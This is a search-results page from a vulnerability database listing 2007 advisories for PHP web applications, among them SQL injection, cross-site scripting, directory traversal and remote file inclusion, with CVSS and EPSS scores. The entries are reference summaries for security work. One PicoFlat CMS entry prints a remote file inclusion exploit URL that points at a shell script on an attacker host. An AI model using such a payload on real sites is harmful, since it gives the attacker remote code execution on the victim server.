Lucene search
K

7210 matches found

seebug.org
seebug.org
added 2007/10/17 12:0 a.m.21 views

PHP File Sharing System Index.PHP目录遍历漏洞

PHP File Sharing System是一款基于PHP的WEB应用程序。 PHP File Sharing System不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞以WEB权限查看系统文件内容。 问题是由于'index.php'脚本对用户提交的WEB参数缺少过滤,提交包含"../"字符作为参数数据,可绕过WEB ROOT限制,以WEB权限查看系统文件内容。 PHP File Sharing System 1.5.1 目前没有详细解决方案提供: http://sourceforge.net/projects/phpfilesadmin/...

7.1AI score
Exploits0
NVD
NVD
added 2007/10/16 11:17 p.m.21 views

CVE-2007-5485

SQL injection vulnerability in index.php in the mg2 1.0 module for KwsPHP allows remote attackers to execute arbitrary SQL commands via the album parameter...

7.5CVSS8.4AI score0.01006EPSS
Exploits0References4
CVE
CVE
added 2007/10/16 11:0 p.m.49 views

CVE-2007-5485

CVE-2007-5485 affects the mg2 1.0 module for KwsPHP. The vulnerability is a SQL injection in index.php via the album parameter, allowing remote attackers to execute arbitrary SQL commands. Exploitation details are not provided in the connected documents; no specific exploit status or in-the-wild ...

7.5CVSS8.4AI score0.01006EPSS
Exploits0References4Affected Software1
Cvelist
Cvelist
added 2007/10/16 11:0 p.m.28 views

CVE-2007-5485

SQL injection vulnerability in index.php in the mg2 1.0 module for KwsPHP allows remote attackers to execute arbitrary SQL commands via the album parameter...

8.4AI score0.01006EPSS
Exploits0References4
securityvulns
securityvulns
added 2007/10/15 12:0 a.m.140 views

[Full-disclosure] PHP File Sharing System 1.5.1

PHP File Sharing System - Directory traversal +--------------------------------------------+ Author: Jonas Thambert Date: 2007-10-13 URL: http://sourceforge.net/projects/phpfilesadmin/ Vendor Notified. Version: 1.5.1 latest - Description - PHP File Sharing System is vulnerable to directory...

0.2AI score
Exploits0
Prion
Prion
added 2007/10/14 7:17 p.m.15 views

Sql injection

SQL injection vulnerability in index.php in the newsletter module 1.0 for KwsPHP, when magicquotesgpc is disabled, allows remote attackers to execute arbitrary SQL commands via the newsletter parameter...

6.8CVSS9.1AI score0.00945EPSS
Exploits0References4Affected Software1
CVE
CVE
added 2007/10/14 7:0 p.m.41 views

CVE-2007-5458

CVE-2007-5458 describes an SQL injection in index.php of the KwsPHP newsletter module 1.0. The vulnerability occurs when magic_quotes_gpc is disabled, allowing remote attackers to inject arbitrary SQL via the newsletter parameter. This is supported by multiple connected records (NVD/NVD listing, ...

6.8CVSS8.4AI score0.00945EPSS
Exploits0References4Affected Software2
Prion
Prion
added 2007/10/12 11:17 p.m.14 views

Sql injection

SQL injection vulnerability in admin/index.php in Interspire ActiveKB 1.5 allows remote attackers to execute arbitrary SQL commands via the questId parameter in a hideQuestion ToDo action. NOTE: the catId vector is already covered by CVE-2007-5131...

6.4CVSS8.7AI score0.01169EPSS
Exploits2References5Affected Software1
NVD
NVD
added 2007/10/12 11:17 p.m.18 views

CVE-2007-5425

SQL injection vulnerability in admin/index.php in Interspire ActiveKB 1.5 allows remote attackers to execute arbitrary SQL commands via the questId parameter in a hideQuestion ToDo action. NOTE: the catId vector is already covered by CVE-2007-5131...

6.4CVSS8.2AI score0.01131EPSS
Exploits1References5
Packet Storm
Packet Storm
added 2007/10/12 12:0 a.m.20 views

picoflat-rfi.txt

PicoFlat CMS Remote file inclusion f0und bY 0in download:http://sourceforge.net/project/showfiles.php?groupid=195156&packageid=230351&releaseid=533796 Greetings to:Dark-coders team members: Die-angel,Slim,Umbro Others: Joker186,Kaja,Wojto111,Rade0n And funny n00b-firends: Pucik and Steryd ; FUN B...

7.4AI score
Exploits0
0day.today
0day.today
added 2007/10/11 12:0 a.m.67 views

PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability

Exploit for unknown platform in category web applications ==================================================================== PicoFlat CMS EXPLOIT: http://x.com/index.php?pagina=http://evil.org/shell.txt? 0day.today 2018-04-12...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2007/10/11 12:0 a.m.42 views

PicoFlat CMS 0.4.14 - &#039;index.php&#039; Remote File Inclusion

PicoFlat CMS Remote file inclusion f0und bY 0in download:http://sourceforge.net/project/showfiles.php?groupid=195156&packageid=230351&releaseid=533796 Greetings to:Dark-coders team members: Die-angel,Slim,Umbro Others: Joker186,Kaja,Wojto111,Rade0n And funny n00b-firends: Pucik and Steryd ; FUN B...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2007/10/11 12:0 a.m.28 views

PicoFlat CMS &lt;= 0.4.14 index.php Remote File Inclusion Vulnerability

No description provided by source. PicoFlat CMS Remote file inclusion f0und bY 0in download:http://sourceforge.net/project/showfiles.php?groupid=195156&packageid=230351&releaseid=533796 Greetings to:Dark-coders team members: Die-angel,Slim,Umbro Others: Joker186,Kaja,Wojto111,Rade0n And funny...

7.1AI score
Exploits0
NVD
NVD
added 2007/10/09 6:17 p.m.10 views

CVE-2007-5297

Cross-site scripting XSS vulnerability in index.php in Minki 1.30 allows remote attackers to inject arbitrary web script or HTML via the page parameter...

4.3CVSS5.7AI score0.01223EPSS
Exploits0References6
CVE
CVE
added 2007/10/09 6:0 p.m.34 views

CVE-2007-5297

CVE-2007-5297 affects Minki 1.30, with a vulnerability in index.php where the page parameter enables cross-site scripting (XSS). The root cause is insufficient input handling in the affected script, allowing injection of arbitrary script/HTML by remote attackers. Public exploitation details or co...

4.3CVSS5.7AI score0.01223EPSS
Exploits0References6Affected Software1
Cvelist
Cvelist
added 2007/10/09 6:0 p.m.14 views

CVE-2007-5297

Cross-site scripting XSS vulnerability in index.php in Minki 1.30 allows remote attackers to inject arbitrary web script or HTML via the page parameter...

5.7AI score0.01223EPSS
Exploits0References6
CVE
CVE
added 2007/10/09 6:0 p.m.43 views

CVE-2007-5295

CVE-2007-5295 affects Wikepage Opus 13 2007.2 and TipiWiki 2, via index.php. The underlying issue is multiple cross-site scripting (XSS) vulnerabilities that allow remote attackers to inject arbitrary script or HTML through the PageContent and PageName parameters. Reported impact per NVD is a Par...

4.3CVSS5.8AI score0.01065EPSS
Exploits0References5Affected Software1
Cvelist
Cvelist
added 2007/10/06 8:0 p.m.22 views

CVE-2004-2688

Cross-site scripting XSS vulnerability in index.php in NewsPHP allows remote attackers to inject arbitrary web script or HTML via the catid parameter. NOTE: this issue might overlap vector 3 in CVE-2006-3358...

5.6AI score0.01033EPSS
Exploits0References4
CVE
CVE
added 2007/10/06 8:0 p.m.45 views

CVE-2004-2688

CVE-2004-2688 / CVE-2006-3358 describe multiple XSS vulnerabilities in NewsPHP’s index.php. The issue is triggered by unsanitized user input through the cat_id parameter (and other vectors in related CVEs), which can cause arbitrary web script/HTML to be injected and reflected in error pages. The...

4.3CVSS6AI score0.01033EPSS
Exploits0References4Affected Software1
CVE
CVE
added 2007/10/06 12:0 a.m.53 views

CVE-2007-5235

The CVE-2007-5235 entry describes a Cross-site Scripting (XSS) vulnerability in Uebimiau, specifically in index.php for versions 2.7.2 through 2.7.10. The issue allows remote attackers to inject arbitrary web script or HTML via the f_email parameter. The provided documents do not include explicit...

4.3CVSS5.6AI score0.01211EPSS
Exploits1References2Affected Software1
Rows per page
Query Builder